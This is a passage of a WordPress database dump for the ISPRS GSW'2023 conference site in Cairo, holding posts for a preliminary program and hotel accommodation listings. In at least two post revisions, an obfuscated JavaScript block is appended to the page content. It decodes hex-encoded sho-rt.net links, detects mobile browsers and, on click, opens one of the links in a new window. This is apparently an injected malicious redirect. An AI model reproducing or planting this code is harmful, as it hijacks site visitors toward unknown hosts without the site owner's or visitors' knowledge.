)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','NOVOTEL CAIRO EL BORG','','inherit','closed','closed','','4729-revision-v1','','','2023-08-01 05:41:43','2023-08-01 05:41:43','',4729,'https://gsw2023.com/?p=5072',0,'revision','',0),
(5073,1,'2023-08-01 05:56:14','2023-08-01 05:56:14','','Preliminary','','inherit','open','closed','','preliminary-3','','','2023-08-01 05:56:14','2023-08-01 05:56:14','',2669,'https://gsw2023.com/wp-content/uploads/2023/08/Preliminary.jpg',0,'attachment','image/jpeg',0),
(5074,1,'2023-08-01 05:56:49','2023-08-01 05:56:49','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3><strong>ISPRS GSW’2023 - Preliminary Program</strong></h3>\n<p>[/vc_column_text][vc_single_image image=\"5073\" img_size=\"1900x1000\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Preliminary Program','','inherit','closed','closed','','2669-revision-v1','','','2023-08-01 05:56:49','2023-08-01 05:56:49','',2669,'https://gsw2023.com/?p=5074',0,'revision','',0),
(5075,1,'2023-08-15 16:42:26','2023-08-15 16:42:26','[vc_row][vc_column][dt_banner image_id=\"2683\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">INTERCONTINENTAL CAIRO SEMIRAMIS</span></h2>\n<ul>\n 	<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><a style=\"color: #ffff00;\" href=\"https://www.ihg.com/redirect?path=asearch&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;checkInDate=01&amp;checkInMonthYear=082023&amp;checkOutDate=08&amp;checkOutMonthYear=082023&amp;rateCode=AAFST&amp;_PMID=99801505&amp;GPC=ARA&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">BOOK NOW</a></span></h5>\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n[/vc_column_text][dt_banner image_id=\"5033\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\n<h1 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #ffffff;\">Ramses Hilton hotel</span></h1>\n<h4></h4>\n<ul>\n 	<li><strong><span style=\"color: #0000ff; font-size: 12pt;\"><a style=\"color: #0000ff;\" href=\"https://www.guestreservations.com/ramses-hilton/booking?msclkid=5045658d464f1148cfd9013a670fd9bc\">Ramses Hilton Hotel &amp; Casino</a></span></strong></li>\n</ul>\n&nbsp;\n\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.5319929288576!2d31.22717948709823!3d30.050281810255406!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c381a29537%3A0xf1d5b3a64a0e4de1!2sRamses%20Hilton!5e0!3m2!1sen!2ssa!4v1689723107695!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong>Deadline for the Special Rates is August 10, 2023</strong></span></h5>\n&nbsp;\n<p style=\"text-align: center;\"><a href=\"https://www.hilton.com/en/attend-my-event/cairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0/\" target=\"_blank\" rel=\"noopener\"><span style=\"color: #ffff00; font-size: 14pt;\"><strong>BOOK NOW</strong></span></a></p>\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4726\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\n<h2 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"font-size: 24pt; color: #ffff00;\">Flamenco Cairo Hotel</span></h2>\n<h4><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"https://www.flamencohotels.com/web/?page_id=5462\">Start – Flamenco (flamencohotels.com)</a></strong></span></h4>\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m16!1m12!1m3!1d27631.27179417239!2d31.19188108296991!3d30.039469195243615!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!2m1!1sFlamenco%20Cairo%20Hotel!5e0!3m2!1sen!2ssa!4v1689724196436!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe>\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is August 10, 2023</span></h4>\n&nbsp;\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/flamenco-cairo-hotel/\"><span style=\"font-size: 18pt;\">BOOK NOW </span> </a></strong></span></h2>\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span>\n<p style=\"text-align: left;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is August 10, 2023</span></h4>\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff; font-size: 14pt;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\"><span style=\"font-size: 24pt;\">BOOK NOW </span> </a></strong></span></h2>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 14pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4788\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Grand Nile Tower Hotel</span></h2>\n<ul>\n 	<li><span style=\"color: #ffffff;\"><a style=\"color: #ffffff;\" href=\"https://www.grandniletower.com/\">https://www.grandniletower.com/</a></span></li>\n</ul>\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3454.091887744032!2d31.22467591511475!3d30.03422158188607!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x14584090695d6421%3A0x201285387107863a!2sGrand%20Nile%20Tower!5e0!3m2!1sen!2ssa!4v1689721277379!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe>\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is August 10, 2023</span></h4>\n<h1 style=\"text-align: center;\"><span style=\"color: #3366ff; font-size: 24pt;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/grand-nile-tower-hotel/\">BOOK NOW</a></strong></span></h1>\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4730\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Novotel Cairo El Borg</span></h2>\n<ul>\n 	<li><span style=\"color: #ffffff; font-size: 12pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></strong></span></li>\n</ul>\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe>\n<ul>\n 	<li>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n</li>\n</ul>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/novotel-cairo-el-borg/\"><span style=\"color: #ffff00;\">BOOK NOW </span> 